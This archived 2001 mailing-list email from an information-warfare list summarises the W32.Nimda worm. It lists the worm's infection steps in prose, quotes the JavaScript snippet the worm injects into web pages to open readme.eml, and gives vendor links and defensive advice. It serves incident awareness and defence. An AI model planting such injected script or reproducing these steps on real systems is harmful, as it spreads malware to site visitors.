Return-Path: <sentto-279987-2041-1000850171-fc=all.net@returns.onelist.com>
Delivered-To: fc@all.net
Received: from 204.181.12.215 by localhost with POP3 (fetchmail-5.1.0) for fc@localhost (single-drop); Tue, 18 Sep 2001 14:57:08 -0700 (PDT)
Received: (qmail 5716 invoked by uid 510); 18 Sep 2001 21:56:36 -0000
Received: from n8.groups.yahoo.com (216.115.96.58) by 204.181.12.215 with SMTP; 18 Sep 2001 21:56:36 -0000
X-eGroups-Return: sentto-279987-2041-1000850171-fc=all.net@returns.onelist.com
Received: from [10.1.4.52] by fk.egroups.com with NNFMP; 18 Sep 2001 21:56:11 -0000
X-Sender: fc@big.all.net
X-Apparently-To: iwar@onelist.com
Received: (EGP: mail-7_3_2_2); 18 Sep 2001 21:56:10 -0000
Received: (qmail 16017 invoked from network); 18 Sep 2001 21:56:10 -0000
Received: from unknown (10.1.10.27) by m8.onelist.org with QMQP; 18 Sep 2001 21:56:10 -0000
Received: from unknown (HELO big.all.net) (65.0.156.78) by mta2 with SMTP; 18 Sep 2001 21:56:10 -0000
Received: (from fc@localhost) by big.all.net (8.9.3/8.7.3) id OAA11665 for iwar@onelist.com; Tue, 18 Sep 2001 14:56:09 -0700
Message-Id: <200109182156.OAA11665@big.all.net>
To: iwar@onelist.com (Information Warfare Mailing List)
Organization: I'm not allowed to say
X-Mailer: don't even ask
X-Mailer: ELM [version 2.5 PL1]
From: Fred Cohen <fc@all.net>
Mailing-List: list iwar@yahoogroups.com; contact iwar-owner@yahoogroups.com
Delivered-To: mailing list iwar@yahoogroups.com
Precedence: bulk
List-Unsubscribe: <mailto:iwar-unsubscribe@yahoogroups.com>
Date: Tue, 18 Sep 2001 14:56:09 -0700 (PDT)
Reply-To: iwar@yahoogroups.com
Subject: [iwar] [fc:Summary.of.new.virus/worm.-.both.of.the.ones.I.listed.earlier.appear.to.be.the.same.one]
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
This is a cumulation of the information i've found on W32.nimda thus far:
W32.nimda is NOT a code red variant, and the people who referring to it as
"Code Blue" were mistaken...
The name it has been given (at least by TruSecure) is W32.nimda.a.mm. It uses
several vulnerabilities in Windows NT and 2000 server's to infect a server,
and also employ's email and web site mobile code to infect Windows
9x/ME/NT/2k boxes.
During the initial infection of a server, the worm does the following:
- download a file named "admin.dll" via tftp from the system that is
trying to infect the target
- add the guest account to the local administrators group and
activates the account
- makes sure c$ is shared out
- copies itself to c, d, and e drives
- tries to mail itself to email addresses that it discovers on the
server
- creates a file named readme.exe, which is used in the mobile code
inserted on the web sites below
- add this string to the web pages found on the server:
<html<script language="JavaScript"window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")</script</html
- scans for and infects other vulnerable IIS servers
- goes through all shared directories and puts sample.nws,
sample.eml, desktop.eml, desktop.nws in each directory. these are eml
messages with copies of itself (readme.exe) autoloaded by the mobile html
code mentioned above.
- goes through all shared directories and puts riched20.dll in each
directory, which is a trogan dll version of W32.nimda that is meant to
infect people running notepad/wordpad in that directory.
- puts a trojan mmc.exe in the winnt directory that is a copy of
itself in the above "readme.exe" format (win2000 only)
If a user views a web site that is hosted on an infected server, the
following happens:
- upon viewing an infected page, the mobile code extracts to
readme.exe and starts in windows media player (without user intervention)
- the user's machine becomes infected with W32.nimda at this point
and time
- the worm starts scanning for other vulnerable IIS servers
- the worm emails itself to everyone on the user's address book
- goes through all shared directories and puts sample.nws,
sample.eml, desktop.eml, desktop.nws in each directory. these are eml
messages with copies of itself (readme.exe) autoloaded by the mobile html
code mentioned above.
- goes through all shared directories and puts riched20.dll in each
directory, which is a trogjan dll version of W32.nimda that is meant to
infect people running notepad/wordpad in that directory.
- puts a trojan mmc.exe in the winnt directory that is a copy of
itself in the above "readme.exe" format (win2000 only)
It us unknown to me what happens (at this point in time) if a user opens an
attachment that is sent from an infected site. It is possible that it could
automatically infect the user's computer using the same methods mentioned
above.
EVERYONE who uses internet explorer to browse the internet should probably do
one of two things to stop from being automatically infected by W32.nimda (i
have not tested whether or not turning off javascript fixes the problem):
o) don't browse web pages until microsoft releases a patch
o) turn OFF javascript
EVERYONE who uses outlook/outlook express should, at the very least, not open
any attachments that they are not expecting. Turning off auto-preview might
be a good idea as well.
Slashdot has an article discussing this:
<a href="http://slashdot.org/articles/01/09/18/151203.shtml">http://slashdot.org/articles/01/09/18/151203.shtml>
On Tuesday 18 September 2001 13:26, Berislav Kucan wrote:
NAI avertlabs marked is as "high", but their VIL database is know
giving some technical errors. These are few vendor responses (not much
information though):
Sophos
http://www.sophos.com/virusinfo/analyses/w32nimdaa.html
NAI
http://vil.nai.com/vil/virusSummary.asp?virus_k=99209
F-Secure
http://www.f-secure.com/v-descs/nimda.shtml
Symantec
http://www.sarc.com/avcenter/venc/data/w32.nimda.a@mm.html
Also NAI calls it Minda, and not Nimda ;) From their info it says -
The virus contains the string :Concept Virus(CV) V.5, Copyright(c) 2001
R.P.China , so reffer to Defcom's Olle Segerdahl post to Incidents and
Bugtraq...
Berislav Kucan
Help Net Security - http://www.net-security.org
IP-Solutions - http://www.ip-solutions.dk
E-mail: <a href="mailto:bkucan@net-security.org?Subject=Re:%20New%20"concept"%20virus/worm?%2526In-Reply-To=%2526lt;20010918181027.3071D2C002@bilbo.cyberjunkees.com">bkucan@net-security.org</a>
Phone: +385 91 513 9159
*********** REPLY SEPARATOR ***********
On 9/18/2001 at 10:57 AM Brett Glass wrote:
At 10:21 AM 9/18/2001, Jay D. Dyson wrote:
It's a two-prong worm. It appears to be primarily
disseminated
via e-mail, and then launches its attacks on web hosts upon
successful
infection.
Newsbytes is calling this worm "Code Rainbow," while some of the
antivirus
firms seem to be calling it "W32.Nimda.A@mm".
---------------------------------------------------------------------------
- This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
--
"Computer games don't affect kids, I mean if Pacman affected us as kids,
we'd all be running around in darkened rooms, munching pills, and listening
to repetitive music." ~unknown
****
Jim Olsen
Systems Administrator
CyberJunkees
****
------------------------ Yahoo! Groups Sponsor ---------------------~-->
Get VeriSign's FREE GUIDE: "Securing Your Web Site for Business." Learn about using SSL for serious online security. Click Here!
http://us.click.yahoo.com/LgMkJD/I56CAA/yigFAA/kgFolB/TM
---------------------------------------------------------------------~->
------------------
http://all.net/
Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/
This archive was generated by hypermail 2.1.2 : 2001-09-29 21:08:45 PDT